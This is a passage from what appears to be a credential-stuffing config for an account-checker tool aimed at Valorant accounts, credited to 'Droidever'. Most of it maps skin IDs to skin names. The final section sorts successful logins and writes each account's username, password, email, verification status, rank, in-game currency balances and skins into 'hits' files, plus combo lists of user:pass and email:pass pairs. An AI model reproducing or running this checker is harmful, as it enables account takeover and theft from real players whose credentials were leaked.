  KEY "8dfec665-4836-d498-2896-08a16c092133" VALUE "Artisan Ghost" 
  KEY "f20bdd80-4cbf-67a8-106e-72bbf94336aa" VALUE "Jigsaw Ghost" 
  KEY "4725c2c4-45b7-d9ab-ff4f-a79c3b2dd9ec" VALUE "Eclipse Ghost" 
  KEY "a9890917-41ea-eb55-47e7-ee990a87fa4e" VALUE "Sovereign Ghost" 
  KEY "efbd92f3-4abc-b077-76fd-dc805b3d72a0" VALUE "Tethered Realms Ghost" 
  KEY "bb28991f-4ca9-ca54-962d-31b68c838625" VALUE "Recon Ghost" 
  KEY "153b2b33-4e6c-fb98-42dd-5a9819649dc7" VALUE "Cavalier Ghost" 
  KEY "1c63b43b-43c4-04e4-01c9-7aa1bffa5ac1" VALUE "" 
  KEY "69addb00-4eb5-eebb-c4c5-2296549cba6f" VALUE "Depths Ghost" 
  KEY "b84df096-4096-e9c4-0869-8e83e7fc5476" VALUE "Ego Ghost" 
  KEY "0a6edcf0-4a64-0ed5-1b10-0e96c2eb4cb4" VALUE "Vendetta Ghost" 
  KEY "845a6945-414c-c916-6041-e4a3ef1108cd" VALUE "Winterwunderland Ghost" 
  KEY "e24330ef-4315-512c-4588-95a601995888" VALUE "Soul Silencer Ghost" 
  KEY "840f12d8-467b-1a5e-f79c-b893b72b2fbc" VALUE "Aristocrat Sheriff" 
  KEY "55ef0ffa-44fe-03ac-dcf0-1982df0857aa" VALUE "Nebula Sheriff" 
  KEY "bfd9e773-4376-1f6a-98f2-dc93f0c0607c" VALUE "Singularity Sheriff" 
  KEY "2674c385-4397-0383-04df-988d8d6fd2c8" VALUE "Surge Sheriff" 
  KEY "4f1fde01-4130-0ae7-1320-6fb2f2fb6ab9" VALUE "Protektor Sheriff" 
  KEY "3194b53a-40a9-a419-a8a6-43b1a53cd0e9" VALUE "Prism II Sheriff" 
  KEY "95eb82e2-4859-5564-7b3b-ddbf2fb8088d" VALUE "K/TAC Sheriff" 
  KEY "46ffe3ea-4fb5-7773-6242-f5b57bf53ef8" VALUE "Minima Sheriff" 
  KEY "721ab58c-4ba2-b7ae-c571-0993d9799fc5" VALUE "Silvanus Sheriff" 
  KEY "83778c03-45a3-67a2-3c89-6b8598327d58" VALUE "Ion Sheriff" 
  KEY "54337477-4aec-4a68-4673-7c8731639d30" VALUE "POLYfox Sheriff" 
  KEY "91d95358-4a3e-3abc-a251-98826225f18d" VALUE "POLYfrog Sheriff" 
  KEY "a5057a74-4a6a-561c-6974-d19a2b939599" VALUE "Lightwave Sheriff" 
  KEY "19b997bb-461a-fa85-250d-a8b0b8908fea" VALUE "Sakura Sheriff" 
  KEY "26ff0e3e-469a-cbdd-f79f-a3b89556cdef" VALUE "Peacekeeper Sheriff" 
  KEY "2ba3ded8-47d5-58e3-1307-39800214636d" VALUE "Sentinels of Light Sheriff" 
  KEY "a40a6ce2-462c-c864-5d30-7b9408b98d3d" VALUE "Reaver Sheriff" 
  KEY "1ef6ba68-4dbe-30c7-6bc8-93a6c6f13f04" VALUE "" 
  KEY "e8fd8fc3-40ce-3ed1-235a-1c8d9654874f" VALUE "Convex Sheriff" 
  KEY "42eaceac-46b2-eec0-2cca-10937761fe9e" VALUE "Varnish Sheriff" 
  KEY "9913da36-48b4-f0f5-db4e-43847a21e476" VALUE "Wasteland Sheriff" 
  KEY "121bc438-4748-b2ee-2c58-768c8c26838b" VALUE "Game Over Sheriff" 
  KEY "bb0d20c6-415d-cf24-e738-0f99db6f9195" VALUE "Death Wish Sheriff" 
  KEY "3a921c7b-4e8f-8543-bee8-01ba6da86874" VALUE "Hivemind Shorty" 
  KEY "1064fbd1-416c-bf00-0e30-a282a359847f" VALUE "Ruin Shorty" 
  KEY "7a3a9e66-4ac1-df74-193b-1984303f4f71" VALUE "Monarch Shorty" 
  KEY "039207fd-4911-9d6b-b7ba-e3ade36ef77e" VALUE "Prism II Shorty" 
  KEY "310b80d8-4e1b-b4f0-b713-9dad458ce734" VALUE "Wunderkind Shorty" 
  KEY "b36dad11-4105-6c08-0486-17ba96d0f2a4" VALUE "Oni Shorty" 
  KEY "9428e52d-4611-c8ff-1b63-7b8e386fe8cb" VALUE "Snakebite Shorty" 
  KEY "48ad078a-4dae-2b85-a945-f4b6d1efecbb" VALUE "" 
  KEY "a39bd1bb-4b17-4d57-c505-7eb15caffa4d" VALUE "Aerosol Shorty" 
  KEY "30635237-4877-4ea4-5ac4-239474d3a662" VALUE "Wasteland Shorty" 
  KEY "4a1e0934-46ae-fa2a-a009-05ade5d43402" VALUE "VALORANT GO! Vol. 2 Operator" 
  KEY "17831113-4ff0-a6c9-0b20-6f9c077d74a2" VALUE "Origin Operator" 
  KEY "33aaa643-4bc4-4c5f-2762-228c7fc03949" VALUE "Red Alert Operator" 
  KEY "a491b943-43e3-4e98-64a6-fc87fca43605" VALUE "Glitchpop Operator" 
  KEY "d722313d-43cb-b38d-7841-75880a3ed2cb" VALUE "Elderflame Operator" 
  KEY "44064b11-4e74-19c9-80a4-9f80875adaf5" VALUE "Nitro Operator" 
  KEY "c692e38e-4f38-0141-d0c9-aa99fab9362a" VALUE "Forsaken Operator" 
  KEY "341ef273-43fb-7911-71e8-50adada4cee1" VALUE "Infantry Operator" 
  KEY "5ced2c69-442e-d1ad-83fe-8fb8b2ac0c0f" VALUE "Prism Operator" 
  KEY "9ffd45c4-4fa4-dca0-f46f-2d99ad1eae20" VALUE "K/TAC Operator" 
  KEY "0bd5da19-491f-dd4a-27e2-c9959b10a87a" VALUE "Luxe Operator" 
  KEY "b2164926-4b85-852a-4bd7-d9bc27a642da" VALUE "Spline Operator" 
  KEY "a0a446f1-443d-3dc8-49c7-f2a70849f092" VALUE "Minima Operator" 
  KEY "83b49f36-4085-8179-6896-1a99f2d2d1d8" VALUE "Silvanus Operator" 
  KEY "bbf8ffb9-49c0-75c0-cc7d-8f8f03a4bd36" VALUE "Ion Operator" 
  KEY "c21e2f34-4b8c-4350-33c8-a8b626ecaadc" VALUE "Gravitational Uranium Neuroblaster Operator" 
  KEY "b05c4c98-4108-e442-add7-da99a95a37b6" VALUE "Sentinels of Light Operator" 
  KEY "aecab890-43b7-d719-06bc-9295e3d116dc" VALUE "Reaver Operator" 
  KEY "e7ba6cec-495f-e08e-f8eb-6e90228bdf9e" VALUE "Tethered Realms Operator" 
  KEY "d47f9576-426f-4da3-761d-39967489550c" VALUE "Cavalier Operator" 
  KEY "d1f2920f-469a-3431-ad96-96afbd0017f2" VALUE "" 
  KEY "5f260f34-4021-ab2c-8080-6287c4f9974b" VALUE "Aerosol Operator" 
  KEY "ccb54094-4db8-2c9f-656b-f1bff329f469" VALUE "Convex Operator" 
  KEY "da29ce1e-43bb-c043-9cbc-34850517dc23" VALUE "RGX 11z Pro Guardian" 
  KEY "2c32d9e3-42a1-7387-35ef-0c8eefacee1c" VALUE "VALORANT GO! Vol. 1 Guardian" 
  KEY "04ccfe05-497c-2d52-2bd0-64a68955175e" VALUE "Spectrum Guardian" 
  KEY "6141a40d-48cf-8466-6d46-558c0ff145ea" VALUE "Nebula Guardian" 
  KEY "00e6b758-448e-af3b-7dee-879aa4a51324" VALUE "Nitro Guardian" 
  KEY "2d5e6025-4166-730e-1024-abb766d19568" VALUE "Songsteel Guardian" 
  KEY "453a734b-4f14-9183-2be8-97b01f603368" VALUE "Ruin Guardian" 
  KEY "acd76d4d-4d05-2597-d63b-12851b2b61ee" VALUE "Infantry Guardian" 
  KEY "2a049f35-4bcd-af25-21fd-ec942e2d5007" VALUE "Prime Guardian" 
  KEY "8966067d-4023-c88a-db56-2691f163d335" VALUE "Ruination Guardian" 
  KEY "f097983d-4c5a-c7ed-c325-039c99bb824e" VALUE "Galleria Guardian" 
  KEY "850fea42-419f-f284-84ae-40ae1eabbb5b" VALUE "Oni Guardian" 
  KEY "96679876-4d41-683c-2e5c-2ea25ddd8fdf" VALUE "POLYfox Guardian" 
  KEY "23a16911-4cb1-2794-2d4c-3f99f1e2516b" VALUE "Jigsaw Guardian" 
  KEY "db348da1-49f2-0bad-b70a-e4ade9d31655" VALUE "Reaver Guardian" 
  KEY "7122d78b-4e60-eb4d-5f65-738d7c1ce9ae" VALUE "Sovereign Guardian" 
  KEY "77187a8f-4020-da44-a775-7a91ab814cdf" VALUE "Tethered Realms Guardian" 
  KEY "539e07ec-49b2-5f22-0d05-91b809229d64" VALUE "Recon Guardian" 
  KEY "cce860fd-4f64-7422-5c95-c7ad2cad0f15" VALUE "Infinity Guardian" 
  KEY "3bf1e8e0-47e8-f27a-6054-929575f41a54" VALUE "" 
  KEY "0a81818d-406e-1d8c-ce4d-9ba89dfdf1ab" VALUE "Ego Guardian" 
  KEY "51da27fe-4a3f-016a-d18d-b68a47545f6f" VALUE "Songsteel Marshal" 
  KEY "027a5d7f-4bfc-7c41-a012-24b8c6720fda" VALUE "Ruin Marshal" 
  KEY "028c7b80-46ea-8f1d-3f7a-4c9c13a79977" VALUE "Monarch Marshal" 
  KEY "dd58ab43-4ff3-659e-8f30-b8bd26619d4d" VALUE "Avalanche Marshal" 
  KEY "6f48f7ff-40a5-cc9e-1320-bdaa388f5cbf" VALUE "Couture Marshal" 
  KEY "27ab5ed6-4614-d5c2-c53f-5391febe7099" VALUE "Magepunk Marshal" 
  KEY "ad6309b5-4788-d401-33d0-4dbaeeadaf87" VALUE "Galleria Marshal" 
  KEY "6eea7984-4ca4-d547-4d50-b4a608072feb" VALUE "POLYfrog Marshal" 
  KEY "4986a893-48a5-4c23-11f2-70bb9e9d284d" VALUE "Artisan Marshal" 
  KEY "5211efa8-4efd-09bb-6cee-72b86a8a5972" VALUE "Sovereign Marshal" 
  KEY "fd44b2d5-49ee-77ab-fa56-588f3ac0c268" VALUE "" 
  KEY "19f06522-40c8-8dc6-a0cd-92808b24751f" VALUE "Wasteland Marshal" 
  KEY "c31856f4-4ae1-cfb8-14cc-10a92b81e7c3" VALUE "Winterwunderland Marshal" 
  KEY "89b78398-4c56-6371-cad7-8eb78ee3f550" VALUE "VALORANT GO! Vol. 1 Spectre" 
  KEY "0eab3e5c-4de4-e221-34fb-2ab435c89eb6" VALUE "Singularity Spectre" 
  KEY "d405272b-4388-578c-e33b-04842496b8c1" VALUE "Hivemind Spectre" 
  KEY "a786ea8f-42f2-ae5f-376f-2bb66df1a62f" VALUE "Forsaken Spectre" 
  KEY "8d4d74c3-4771-52a3-b3eb-a38cc0222643" VALUE "Infantry Spectre" 
  KEY "eb9ec7c9-4c20-e702-81c7-63bbe165aa12" VALUE "Horizon Spectre" 
  KEY "20807bd8-4259-35e5-e54e-c1b214f58cc8" VALUE "Prime Spectre" 
  KEY "a0938d46-4593-19b4-1aa5-f3b32ecb9963" VALUE "Avalanche Spectre" 
  KEY "b9836020-433a-ace4-eb35-3fbd67688c53" VALUE "Prism Spectre" 
  KEY "4643050b-417c-0d84-3626-27b709c49c67" VALUE "Serenity Spectre" 
  KEY "f9c2e823-4eeb-d872-8a4c-d5a0bf8a3b6c" VALUE "Ruination Spectre" 
  KEY "30b19f29-419b-1adc-3561-40be2b1f7841" VALUE "Kingdom Spectre" 
  KEY "3eb4d837-4ae9-b52a-b41d-2789f9974f15" VALUE "Luxe Spectre" 
  KEY "a3f8e1b3-4654-f3ea-15ba-9eb9fd6a0b0d" VALUE "Magepunk Spectre" 
  KEY "418ef9fe-4675-6620-3755-c19aca3ff131" VALUE "Spline Spectre" 
  KEY "2d28e21f-4986-650d-70bd-a2927a0e337b" VALUE "Minima Spectre" 
  KEY "9042279e-4491-1a01-a346-928f89f01ea7" VALUE "POLYfrog Spectre" 
  KEY "4a8e8ff6-44f2-0ebf-6fa8-a5af76b628ee" VALUE "Gravitational Uranium Neuroblaster Spectre" 
  KEY "26b1c794-4370-f354-ff4d-3a8b95edff79" VALUE "Recon Spectre" 
  KEY "53ab2a6a-46c5-32b9-e045-6781e677d7ff" VALUE "Infinity Spectre" 
  KEY "f01d1307-4299-42f5-2c5e-7dab7e69ab19" VALUE "" 
  KEY "c8a5ba23-4f0d-c7de-8e2f-c184e2fc27ba" VALUE "Convex Spectre" 
  KEY "b4e5bb69-4e12-113f-c43b-efa5b13cb96d" VALUE "BlastX Spectre" 
  KEY "f7da43d8-450b-a03f-ceb7-c4b20f738392" VALUE "Wasteland Spectre" 
  KEY "282c15e6-4372-2f18-9143-2d9cdd942c4c" VALUE "RGX 11z Pro Stinger" 
  KEY "42da0f19-4017-5cb8-08a4-368315561fdf" VALUE "Aristocrat Stinger" 
  KEY "0cf70376-4150-39aa-5657-8890617bc0d1" VALUE "Red Alert Stinger" 
  KEY "0a128cb6-4bbb-f618-85cb-82bbd17bcbb1" VALUE "Surge Stinger" 
  KEY "338e3ee3-4927-733f-32b6-bcac795d23ac" VALUE "Prism II Stinger" 
  KEY "598bb272-4bfd-ae82-0242-6490cc6f721e" VALUE "Couture Stinger" 
  KEY "847fe9da-45cc-21d4-0138-7aa4d8b31d8e" VALUE "Silvanus Stinger" 
  KEY "9d7ed392-4c4c-b1c4-7232-3cbb07b2e133" VALUE "Sensation Stinger" 
  KEY "1cd6f578-483b-37a1-a7ef-9a907fac416a" VALUE "Sakura Stinger" 
  KEY "8fb27bb1-4080-581d-bcd3-53ae01861654" VALUE "Sovereign Stinger" 
  KEY "51e2b876-4339-521d-8d68-9aaec119bc1f" VALUE "Cavalier Stinger" 
  KEY "940fb417-4a9c-3004-41f5-3e8f1f4178b2" VALUE "" 
  KEY "e1297b8f-4374-3131-27a9-38bb0eda1c0d" VALUE "Depths Stinger" 
  KEY "8fe5ebbc-4ce7-a248-9766-288441706e0a" VALUE "Ego Stinger" 
  KEY "26fbcf26-4135-b8e3-277e-8a9c27e3d34d" VALUE "Varnish Stinger" 
  KEY "9fb366b6-46df-a722-0cf2-9c9b85936f17" VALUE "RGX 11z Pro Blade" 
  KEY "9103fdf7-4361-5ac5-37ae-7cb51f13f45d" VALUE "VALORANT GO! Vol. 1 Knife" 
  KEY "d034911c-45a6-1ce4-e6f5-4cbe57e9d4f1" VALUE "Yoru's Stylish Butterfly Comb" 
  KEY "400bb847-4f4f-a39e-cd52-589f00b2204f" VALUE "Waveform" 
  KEY "ac687fc4-40c5-4c41-6a7c-5eb59adabd60" VALUE "Origin Crescent Blade" 
  KEY "a4c41553-4ba5-efee-5685-7a9f0cdf7878" VALUE "Nebula Knife" 
  KEY "ddc025b2-475f-889a-2800-80b4215582bc" VALUE "Glitchpop Dagger" 
  KEY "f0c42e14-4a92-132d-dfd4-cbbef103340c" VALUE "Glitchpop Axe" 
  KEY "94b40026-4efb-39ea-69d7-fca60be39c56" VALUE "Elderflame Dagger" 
  KEY "151ee26c-4e82-e7ca-dad1-099e7fb34774" VALUE "Singularity Knife" 
  KEY "45129867-4977-e2a5-bead-cb828101b623" VALUE "Songsteel" 
  KEY "24cf2882-48c7-f287-155a-a4b6b083baa4" VALUE "Hivemind Sword" 
  KEY "ed792f00-43a7-cc88-b64b-b78c9de399a1" VALUE "Forsaken Ritual Blade" 
  KEY "9c350ebe-458b-e6ed-ab77-2fb00cf249c1" VALUE "Ruin Dagger" 
  KEY "e100dff1-4cf5-54ec-aa65-6fadbc22973b" VALUE "Prime Axe" 
  KEY "9237e734-4a2a-38ae-7438-6cbee901877d" VALUE "Prime//2.0 Karambit" 
  KEY "908be835-43bc-b728-35a4-0fa91f612cc0" VALUE "Outpost Melee" 
  KEY "6fa830c2-4924-87b2-1510-2fa4fbdca1db" VALUE "Prism Knife" 
  KEY "0c07c7f3-4532-bc57-d474-26b3b39a38e6" VALUE "Prism III Axe" 
  KEY "b1e9530d-4618-4f2e-1b75-f1a90c91b19e" VALUE "Broken Blade of the Ruined King" 
  KEY "f82aa022-4a6c-fa40-105d-92af6510ae1b" VALUE "Kingdom Knife" 
  KEY "83e8641b-41d0-821d-5eeb-5999e9294a0c" VALUE "K/TAC Blade" 
  KEY "46163791-47b9-2ef0-d255-aaa5146051bb" VALUE "Smite Knife" 
  KEY "7d45aaad-4ac9-77b1-e7ca-3991be5721dd" VALUE "Celestial Fan" 
  KEY "4af88517-4949-9caa-9dda-1980f07202a4" VALUE "Luxe Knife" 
  KEY "c18e781e-40a0-80e6-256a-54ae7355e7eb" VALUE "Magepunk Electroblade" 
  KEY "f6cfd500-4eab-3c1d-9eeb-188e90731692" VALUE "Spline Dagger" 
  KEY "46664f5b-49ca-3e09-4fe5-56bdef536335" VALUE "Ion Energy Sword" 
  KEY "206fc3fe-45a0-6c19-c367-229b98b6a2aa" VALUE "Oni Claw" 
  KEY "c39f405f-42f1-acd1-a350-d3af39c32e33" VALUE "Artisan Foil" 
  KEY "0357caf1-41a9-cb1c-c080-38aab13d9a7e" VALUE "Gravitational Uranium Neuroblaster Baton" 
  KEY "6fd8cc46-48b3-f02c-46e3-cba372e7a328" VALUE "Relic of the Sentinel" 
  KEY "0aecb2b8-49cc-560e-42c7-6cbce44f05cf" VALUE "Reaver Knife" 
  KEY "2e77ac95-4681-3d87-bbdc-93a50ff6b1f6" VALUE "Sovereign Sword" 
  KEY "f4e40444-43f3-e6f7-3271-bdb7d1492b05" VALUE "Prosperity" 
  KEY "39cf499b-4f82-e875-5320-b0a1d7fc58d4" VALUE "Recon Balisong" 
  KEY "12cc9ed2-4430-d2fe-3064-f7a19b1ba7c7" VALUE "" 
  KEY "c52fe5d7-4500-ffc0-cbcd-bfa29b7ea040" VALUE "Ego Knife" 
  KEY "5844ccd5-4a8d-e84d-b5b1-dfaaa8f34d84" VALUE "BlastX Polymer KnifeTech Coated Knife" 
  KEY "e49c0fd2-435c-2c41-9164-4996080f455b" VALUE "Winterwunderland Candy Cane" 
  "<skin1[*]>" -> VAR "skin2" 

#skin_donuşturme FUNCTION Translate 
  KEY ", , , , , , , , , , , , , , , , " VALUE "Standart Skin" 
  "<skin2>" -> CAP "Skins" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<cont>" DoesNotContain "[][]" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<cont>" Contains "[][]" 

PARSE "<SOURCE>" LR "Ok=" "" -> VAR "o" 

FUNCTION Translate 
  KEY "1" VALUE "No" 
  KEY "0" VALUE "Yes" 
  "<o>" -> CAP "Checked" 

IF "<Valorant Point>" Lessthan "1"

UTILITY File "DB\\Valo All Hits.txt" AppendLines "[--------------Hit---------------]\\n - Info: <USERR>:<PASS>\\n - Game Name: <Game Name> \\n - Tag: <Tag Line>\\n - Region: <Region>\\n - Region 2: <reg2>\\n - Rank: <Rankw>\\n - Email: <Email>\\n - Email Verifed: <EmailVerified>\\n - Last Play: <Dates>\\n - ValoPoint: <Valorant Point> \\n - Radiant: <Radianite Points>\\n - Skins: <Skins>\\n - by Droidever\\n[--------------Droidever---------------]\\n  " 

ENDIF
IF "<Valorant Point>" GREATERTHAN "10"

UTILITY File "DB\\Valo VP.txt" AppendLines "[--------------Hit---------------]\\n - Info: <USERR>:<PASS>\\n - Game Name: <Game Name> \\n - Tag: <Tag Line>\\n - Region: <Region>\\n - Region 2: <reg2>\\n - Rank: <Rankw>\\n - Email: <Email>\\n - Email Verifed: <EmailVerified>\\n - Last Play: <Dates>\\n - ValoPoint: <Valorant Point> \\n - Radiant: <Radianite Points>\\n - Skins: <Skins>\\n - by Droidever\\n[--------------Droidever---------------]\\n  " 

ENDIF
IF "<Radianite Points>" GREATERTHAN "10"

UTILITY File "DB\\Valo RP.txt" AppendLines "[--------------Hit---------------]\\n - Info: <USERR>:<PASS>\\n - Game Name: <Game Name> \\n - Tag: <Tag Line>\\n - Region: <Region>\\n - Region 2: <reg2>\\n - Rank: <Rankw>\\n - Email: <Email>\\n - Email Verifed: <EmailVerified>\\n - Last Play: <Dates>\\n - ValoPoint: <Valorant Point> \\n - Radiant: <Radianite Points>\\n - Skins: <Skins>\\n - by Droidever\\n[--------------Droidever---------------]\\n  " 

ENDIF
IF "<EmailVerified>" Contains "False"

UTILITY File "DB\\Valo Unverfied.txt" AppendLines "[--------------Hit---------------]\\n - Info: <USERR>:<PASS>\\n - Game Name: <Game Name> \\n - Tag: <Tag Line>\\n - Region: <Region>\\n - Region 2: <reg2>\\n - Rank: <Rankw>\\n - Email: <Email>\\n - Email Verifed: <EmailVerified>\\n - Last Play: <Dates>\\n - ValoPoint: <Valorant Point> \\n - Radiant: <Radianite Points>\\n - Skins: <Skins>\\n - by Droidever\\n[--------------Droidever---------------]\\n  " 

ENDIF
IF "<EmailVerified>" Contains "True"

UTILITY File "DB\\Valo Verfied.txt" AppendLines "[--------------Hit---------------]\\n - Info: <USERR>:<PASS>\\n - Game Name: <Game Name> \\n - Tag: <Tag Line>\\n - Region: <Region>\\n - Region 2: <reg2>\\n - Rank: <Rankw>\\n - Email: <Email>\\n - Email Verifed: <EmailVerified>\\n - Last Play: <Dates>\\n - ValoPoint: <Valorant Point> \\n - Radiant: <Radianite Points>\\n - Skins: <Skins>\\n - by Droidever\\n[--------------Droidever---------------]\\n  " 

ENDIF

UTILITY File "DB\\Valo UserPass.txt" AppendLines "<USERR>:<PASS>" 

UTILITY File "DB\\Valo MailPass.txt" AppendLines "<Email>:<PASS>" 

